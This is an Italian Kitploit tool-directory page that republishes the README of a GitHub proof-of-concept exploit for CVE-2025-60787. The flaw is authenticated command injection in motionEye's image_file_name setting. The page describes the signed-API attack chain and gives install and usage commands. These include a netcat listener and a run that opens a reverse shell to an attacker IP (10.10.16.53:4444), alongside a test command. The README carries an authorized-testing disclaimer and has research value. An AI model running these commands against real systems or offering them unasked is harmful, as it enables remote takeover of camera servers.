Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye iniezione di comandi autenticata RCE PoC | Kitploit
Strumenti/GitHubGitHub/ozcanpng/cve-2025-60787
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye iniezione di comandi autenticata RCE PoC

Vedi Repository
22 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-60787 — RCE autenticata in motionEye

PoC di command injection autenticata per CVE-2025-60787. motionEye v0.43.1b4 e versioni precedenti scrivono valori di configurazione della telecamera controllati dall'utente, come image_file_name, nella configurazione di Motion senza una sufficiente sanificazione, consentendo l'esecuzione di comandi quando il valore viene elaborato.

Solo per test autorizzati e ricerca. Non utilizzare contro sistemi di cui non si è proprietari o per cui non si ha esplicito permesso di test.


Cosa fa

root@kitploit:~
Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. Valida il target e rileva motionEye.
  2. Genera richieste API motionEye firmate usando il nome utente e l'hash della password configurati.
  3. Legge la configurazione della telecamera tramite /config/list/.
  4. Inietta un comando nell'impostazione image_file_name della telecamera.
  5. Abilita le immagini fisse/istantanee manuali dove necessario.
  • Attiva /action/<camera_id>/snapshot/ in modo che motionEye elabori il nome file iniettato.
  • Opzionalmente ripristina la configurazione originale della telecamera.

  • Schermate

    Preparazione della reverse shell

    Preparazione della reverse shell

    Iniezione della configurazione e attivazione

    Iniezione della configurazione e attivazione

    Shell ricevuta

    Shell ricevuta


    Installazione

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2025-60787.git
    cd CVE-2025-60787
    pip install -r requirements.txt
    

    Utilizzo

    Verifica sicura del comando

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --user admin \
      --password-hash HASH \
      --cmd 'id > /tmp/motioneye_rce'
    

    Reverse shell

    Avviare prima un listener:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Quindi eseguire:

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --port 8765 \
      --user admin \
      --password-hash HASH \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    Opzioni utili:

    root@kitploit:~
    --camera-id N      Camera ID to modify (default: 1)
    --restore          Restore the original camera configuration after triggering
    --dry-run          Build signed requests without modifying the target
    --debug            Print canonical signed paths, bodies and signatures
    --no-trigger       Update config without triggering a snapshot
    --verify-tls       Verify HTTPS certificates
    --yes              Skip reverse-shell confirmation prompt
    

    Prodotti interessati

    ProdottoVersione interessataAccesso richiestoImpatto
    motionEye<= 0.43.1b4Accesso amministratore/API autenticatoEsecuzione di comandi a livello di sistema operativo come utente del processo motionEye/Motion

    Il privilegio risultante dipende da come motionEye è distribuito. In contenitori o immagini di laboratorio che eseguono il servizio come root, l'esecuzione dei comandi può avvenire con privilegi di root.


    Note

    • Il PoC richiede il valore/hash della password motionEye memorizzato perché tale valore viene usato come chiave di firma per le richieste API legacy.
    • Il campo iniettato è image_file_name.
    • Usare --restore durante i test per ripristinare la configurazione originale della telecamera dopo lo sfruttamento.
    • Preferire --cmd per una validazione sicura prima di tentare una reverse shell.

    Riferimenti

    • NVD — CVE-2025-60787
    • GitHub Security Advisory — GHSA-j945-qm58-4gjx
    • Progetto motionEye

    Autore

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    Scarica lo strumento